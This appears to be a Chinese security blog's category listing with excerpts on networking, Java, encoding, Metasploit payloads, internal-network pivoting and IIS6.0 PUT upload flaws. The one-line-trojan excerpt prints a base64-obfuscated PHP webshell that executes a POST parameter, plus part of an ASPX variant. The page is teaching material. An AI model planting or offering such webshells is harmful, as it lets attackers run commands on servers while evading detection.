理论基础
文章平均质量分 74
web基础知识,协议分析,网络协议通信原理
Buffedon
目标为导向,问题为驱动。
展开
-
Linux基础知识
linux相关的基础知识,包括进程管理,内存管理,文件系统等原创 2022-07-06 23:11:29 · 555 阅读 · 0 评论 -
【基础概念】域的相关概念
域的相关概念域名服务器 - DNS域内组的概念1. 域本地组2. 全局组3. 通用组域策略A-G-DL-PA-G-G-DL-PA-G-U-DL-P参考域是一个安全边界,是工作组的升级版,在域内的计算机可以共享资源域名是Internet上某一台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位(有时也指地理位置)。域名是由一串用点分隔的名字组成的,通常包含组织名,而且始终包括两到三个字母的后缀,以指明组织的类型或该域所在的国家或地区。例如:www.baidu.com域名服务器 - DNSDN原创 2022-03-04 23:16:08 · 4985 阅读 · 0 评论 -
【理论知识】-- msf简介
payload模块的三种类型payload 模块主要有以下三种类型:Single、Stager、Stage。Single是一种完全独立的Payload,而且使用起来就像运行 calc.exe 一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似 netcat 这样的非metasploit处理工具所捕捉到。Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payloa原创 2022-02-17 11:48:33 · 1285 阅读 · 1 评论 -
一句话木马变形(编码)
一句话木马变形(编码)注意:如果全文只是加密的密文的话,那么就相当于是一个字符串,在解析的时候不符合语义,依然不会检测出来base64 编码php<?php$c = base64_decode('YXNzZXJ0');$c($_POST['pwd']);?>java语言<%@ Page Language="Jscript" Debug=true%><%var a=Request.Form("mr6");var res=System.Text.Encod原创 2021-12-20 00:15:14 · 820 阅读 · 0 评论 -
内网转发简介
内网转发内网转发分类分类方式一 (按原理分)分类方式二 (按攻击手法分)端口转发,隧道,代理,反弹shell反弹shell的目的端口转发动态转发本地转发远程转发端口转发与端口映射代理参考文章在后渗透阶段,外网是无法访问内网的,因此可以通过 端口转发(隧道) 的方式,将web服务器作为代理,从而使得攻击者可以操控内网主机内网转发分类分类方式一 (按原理分)代理方式socketNetcat,netsh,LCXsocksEW,Ssocks隧道方式SSH,HTTP,IMCP原创 2021-10-06 20:05:14 · 842 阅读 · 0 评论 -
正向代理和反向代理
正向代理和反向代理正向代理反向代理Nginx 反向代理端口转发和端口映射端口转发端口映射代理用在客户端和服务器端之间正向代理正向代理是面向客户端的客户端需要知道服务器的地址客户端需要配置代理的IP和端口号对于服务器而言,服务器不知道客户端是谁,只知道代理,可以很好地隐藏客户端。因此我们常常挂一个国外的代理去访问国外的网站。经常用于内网通过防火墙访问外网,类似于我们上网的过程,只是我们上网的时候一般都没有配置代理。反向代理反向代理是面向服务器的客户端不知道服务器的地址,只需知道代理的原创 2021-07-19 22:03:27 · 599 阅读 · 2 评论 -
【编码和加密】BASE64--ASCII--HASH
常见 编码/加密 算法Base64 加密特征HASH(散列函数)MD5计算过程SHA-1SHA-2ASCII 编码Base64 加密特征每三个字节变成四个字节字节数/3 余1,在最后添加 ==。例如 % 的bash64 编码为 JQ==字节数/3 余2,在最后添加 =。例如 % 的bash64 编码为 YWI=每76个字符加一个换行符最后的结束符也要处理举个例子example 转换为二进制之后(利用ASCII 转换的)01100101 01111000 01100001原创 2021-09-19 19:01:30 · 731 阅读 · 0 评论 -
日志审计系统及ELK日志系统
日志审计系统1.日志审计1.1 背景1.2 原理核心目标1.3 功能日志采集关联分析实时警告日志取证分析监管合规1.4 日志审计系统常见模块2.ELK 日志系统介绍2.1 背景2.2 简介2.3 原理1.日志审计1.1 背景网络安全发的颁布,日志审计的合规要求,由原来的不合规变成了不合法。如果不对要求的相关日志存留6个月以上,一旦追查,将面临法律责任。安全运营的挑战。随着网络设备的增多,以及服务器数量的增多,如果没有统一的综合日志审计平台,那么需要登录到每台设备上查看日志,不利于管理。众多平台会产原创 2021-09-17 00:27:59 · 3690 阅读 · 0 评论 -
RMI 框架工作原理(附源码)
RMI 框架RMI 框架1.RMI框架出现的背景分布式对象模型2.RMI 基本原理客户端请求调用远程对象的方法RMI 框架采用代理来封装通信细节3.创建RMI 应用流程(文章最后有源码详解)问题思考参考文献源代码RMI 框架应用在分布式开发。在RMI中,首先服务器端的某个类要 extends java.rmi.Romote ,然后在 RMI 注册器中注册远程对象,客户端通过代理访问 RMI 注册器,查询远程对象,最后才能调用服务器上的远程对象。详细过程HelloService 接口要 exte原创 2021-09-09 01:05:33 · 669 阅读 · 0 评论 -
Java成员变量和静态变量的区别
成员变量也叫全局变量,能够描述一个类的属性,与局部变量对立。成员变量在类中,类方法外局部变量一般在方法中,循环体中等静态变量用 static 修饰的的变量是静态变量,静态变量的内容可以被所有对象共享,能全局使用Student.javapublic class Student { private int id; public static String name="Bob"; //静态变量 public static int age; //静态变量}Fun原创 2021-09-08 23:38:55 · 850 阅读 · 1 评论 -
类、抽象类、接口的概念及区别
类、抽象类、接口类、抽象类、接口抽象类Java 接口接口代码格式接口和类的区别接口的实现(代码)参考文章类、抽象类、接口类要说实例化;接口不能说实例化,要说实现了一个接口抽象类在 Java 中,含有抽象方法的的类称为抽象类,不能生成对象抽象方法抽象方法是指没有方法体({})的方法,同时抽象方法还必须使用关键字 abstractpublic abstract void fun();Java 接口Interface 在Java 中是一个抽象类型,是抽象方法的集合。一个类通过继承接口的方式,从原创 2021-09-08 23:36:21 · 373 阅读 · 0 评论 -
Content-Type
Content-TypeContent-Type 介绍application/x-www-form-urlencodedmultipart/form-dataapplication/jsonapplication/octet-streamtext/...image/Content-Type 介绍是HTTP 协议中的某个字段注意 requestHead 和 requestBody中都有 Content-Type,其实表达的意思是一致的。用于定义网络文件的类型和网页的编码Content-Type(Mi原创 2021-09-07 19:12:19 · 188 阅读 · 0 评论 -
IIS6.0解析漏洞——PUT方式上传文件
IIS6.0解析漏洞IIS6.0解析漏洞解析漏洞原理介绍PUT上传原理PUT上传探测PUT上传利用(漏洞复现)PUT的利用COPY的利用PUT文件上传防范解析漏洞防范补充:HTTP 中请求方式汇总1. OPTION2. HEAD3. PUT4. DELETE5. TRACE6. CONNECTIIS6.0解析漏洞解析漏洞原理介绍1. 当建立 *.asa、*.asp 格式的文件夹时,其目录下的任意文件都被IIS当做asp文件解析2. 当文件是 *.asp;1.jpg ,IIS6.0同样会将文件作为a原创 2021-08-26 23:18:22 · 3109 阅读 · 0 评论 -
HTTPS加密过程
HTTPS加密过程HTTPS加密过程名词解析密钥安全交换为什么要有CA机构反向理解HTTPS 安全通信机制HTTPS加密过程HTTPS 是 HTTP + SSL原本HTTP 是直接和传输层进行通信的,不经过加密。但是这就给了不法分子有机可乘。HTTPS加密方式:在交换密钥阶段使用非对称加密方式,之后建立通信交换报文阶段则使用对称加密方式名词解析对称加密:加密和解密是同一个密钥。加密时就必须将密钥传送给对方,但是如何保证安全机制呢非对称加密:加密和解密使用的密钥不一致。使用此加密方式,发送密文的原创 2021-08-06 23:41:52 · 84 阅读 · 0 评论 -
Cookie和Session的理解
Cookie和Session的理解1.Cookie1.1 定义1.2 Cookie的组成1.3 cookie的工作原理1.4 安全威胁Cookie捕获/重放恶意 Cookies会话定置CSRF攻击1.5 安全防护Web服务器端防护客户端浏览器防护主机的安全防护2. Session2.1 定义2.2 Session的工作原理3. cookie和session的联系与区别3.1 共同之处3.2 session 与 cookie 的区别1.Cookie1.1 定义类型为“小型文本文件”,是某些网站为了辨别用转载 2021-06-16 16:42:54 · 197 阅读 · 0 评论 -
WEB服务器,中间件,容器
WEB服务器,中间件,容器web服务器中间件容器总结web服务器广义的web服务器(Web Server):提供web服务的软件或主机,即Web服务器软件或装有Web服务器软件的计算机。例如:IIS、apache、nginx等。Web服务器可以处理 HTTP 协议,响应针对静态页面或图片的请求,进行页面跳转,或者把动态请求委托其它程序(它的扩展、某种语言的解释引擎(php)、Web容器)。所以,我们可以把 IIS、Apache、Nginx、Tomcat等都称为Web服务器,因为他们都提供了web服务。原创 2021-06-06 16:54:29 · 1731 阅读 · 0 评论